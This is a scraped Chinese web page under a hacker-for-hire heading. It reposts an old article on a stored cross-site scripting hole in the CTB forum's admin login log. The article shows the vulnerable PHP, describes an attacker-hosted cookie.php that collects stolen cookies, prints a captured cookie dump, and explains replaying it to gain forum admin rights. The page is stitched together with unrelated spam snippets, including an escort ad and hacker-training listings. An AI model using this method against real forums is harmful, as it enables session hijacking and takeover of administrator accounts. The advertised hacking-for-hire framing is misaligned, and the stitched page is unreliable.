黑客接单 无定金24小时接单的黑客qq群

访客4年前黑客资讯933

本文作者:sniper 文章性质:原创 发布日期:2004-04-16 注:本文已在《黑客X档案》发表,转载请保留此信息。 ============================================   记得很久前PSKEY写过一篇CTB论坛存在的一个可以直接添加管理员的漏洞,的确CTB论坛的代码可读性非常好,是一个非常的美观的文本论坛。前几天找了套最新的1.63版的论坛代码来看了看,发现了一些不足之处可以让攻击者获得论坛管理权限。   在CTB论坛中对前台和后台登陆的情况都设置了一个日志记录供管理员查看,可以让管理员尽快发现论坛是否被人入侵。但是对于用户递交的数据没有进行任何处理就记录到了日志当中,我们可以通过递交特殊的语句来进行跨站攻击,从而直接得到密码。   我们看看admin目录下的login.php文件的日志处理部分的代码: 代码: -------------------------------------------------------------------------------- //后台管理员登陆日志 function adminLoginLog($check="ok") { if($this->set[logRecord] == "N"){ return false; } $msgArray[phpCode] = $this->code; //判断文件大小是否需要清空 if (filesize("../".$this->set['dataPath']."/log_adminlogin.php") > $this->set['logRecordSize']){ $this->file = "../".$this->set['dataPath']."/log_adminlogin.php"; $this->null_write(""); } //登陆错误 //省去部分代码........ //登陆失败 else { $msgArray[loginMode] = 0; $msgArray[loginId] = $this->input['userName']; $msgArray[wrongMsg] = $check; $msgArray[userIp] = $this->ip; $msgArray[loginTime] = time(); $msgArray[temp1] = "";//备用 $msgArray[temp2] = "";//备用 $this->file = "../".$this->set['dataPath']."/log_adminlogin.php"; $this->add_line($msgArray); } } --------------------------------------------------------------------------------   从代码上看我们递交的用户名等信息既不会进行任何过滤也无论正确与否都会被保存到log_adminlogin.php里去,当管理员登陆到后台查看日志的时候就会显示出log_adminlogin.php里面记录的登陆信息,我们也就可以通过这个 *** 来得到管理员的ID和密码等信息。   我们打开后台登陆页面,在用户名那里输入: 代码: -------------------------------------------------------------------------------- --------------------------------------------------------------------------------   因为无论登陆成功否,程序都会进行记录,所以密码我们可以随便填。其中192.168.1.1为我们放置cookie.php的网址,cookie.php为一个可以获得cookie信息的PHP文件。现在我们要做的就是等了,只要管理员一查看后台登陆日志,我们的PHP程序就会把他的COOKIE截取下来。   让我们看看截取到的文件内容: 引用: -------------------------------------------------------------------------------- ctb_user_login=ctb;%20ctb_user_pass=ce445102682e75bf533d44e1afc38a90;%20ctb_login_mode=1;%20eremite=0;%20skins=2;%20fylinklinkfylogin=cpb;%20userpass=2BA2A8AC968A7A2B0A7BAA7F2FEF18D2;%20username=sniper;%20Dwebdv=userid=1&usercookies=2&userhidden=&password=0reu3g775VrY7458&userclass=%B9%DC%C0%ED%D4%B1&username=admin&StatUserID=3980383;%20TZ=480;%20PHPSESSID=d8765179dc4f3a8708515a031216e503 --------------------------------------------------------------------------------   我们需要只有ctb_user_login、ctb_user_pass和ctb_login_mode三个就可以得到前台管理权限了,有了这些信息,我们要获得前台管理员权限就非常容易,用IECookieView找到我们要编辑的COOKIE,把相应的部分替换掉,保存后再进入该站点你就是前台管理员了。   很简单的我们就得到了论坛的管理权限,如果被人利用,那么相信后果是非常严重的,希望用CTB论坛的朋友关注他们的官方站点的补丁发布情况,尽快修补该漏洞,以免造成不必要的损失。

相关文章

Axure教程:获取页面尺寸、内联框架自适应大小

Axure教程:获取页面尺寸、内联框架自适应大小

编辑导语:如何利用Axure去获取页面尺寸,而且使内联框架自适应巨细呢?本文作者通过实际操纵,举办了记录总结,但愿看后对你有所辅佐。 本日要演示的对象其实很简朴,一两分钟就能做完,主要是用来补充Ax...

雇佣黑客找ip地址,性感女黑客网络走红,如何查询微信聊天记录 黑客

2.76 此Excel文档还会创立一个名为“windows update check”的计划任务,每分钟运转文件C:Users.templatesSystem Manager.exe一次,最终的VBA...

全国一二线高端资源,私人订制商务陪伴经纪【曹纨】

今天给大家分享的内容是“全国一二线高端资源,私人订制商务陪伴经纪【曹纨】”,我是曹纨,来自来宾市,今年19岁,作为职业:外籍商务,我热爱我的职业:外籍商务。三圍:胸62腰94臀62 鞋碼:37,模特伴...

scratch怎么制作新年快乐的祝福动画,scratch制作新年快乐的祝福动画教程

朋友们大家了解scratch如何制作春节快乐的祝愿动漫呢?今日我很愿意与大伙儿共享scratch制做春节快乐的祝愿动画教程,很感兴趣的能够来掌握掌握哦。       朋友们大家了解scratch如何制...

夏冰黑客,公司被黑客给黑了网络瘫痪,黑客可以攻入上海市网站吗

在2019年,npm 的缝隙数量添加了 47%用户支撑sudo apt-get install screen #Debian Like陈述显现,2019年第一季度,360互联网安全中心在PC端与移动端...

中国黑客培训网络学校(黑客技术培训机构排名)

中国黑客培训网络学校(黑客技术培训机构排名)

本文导读目录: 1、黑基网 好吗 2、网络安全培训哪里好? 3、黑客入门新手特训 4、武汉电脑培训去哪里?黑客技术学校,武汉银河网盾 5、网络安全培训机构哪家好 黑基网 好吗 本人黑...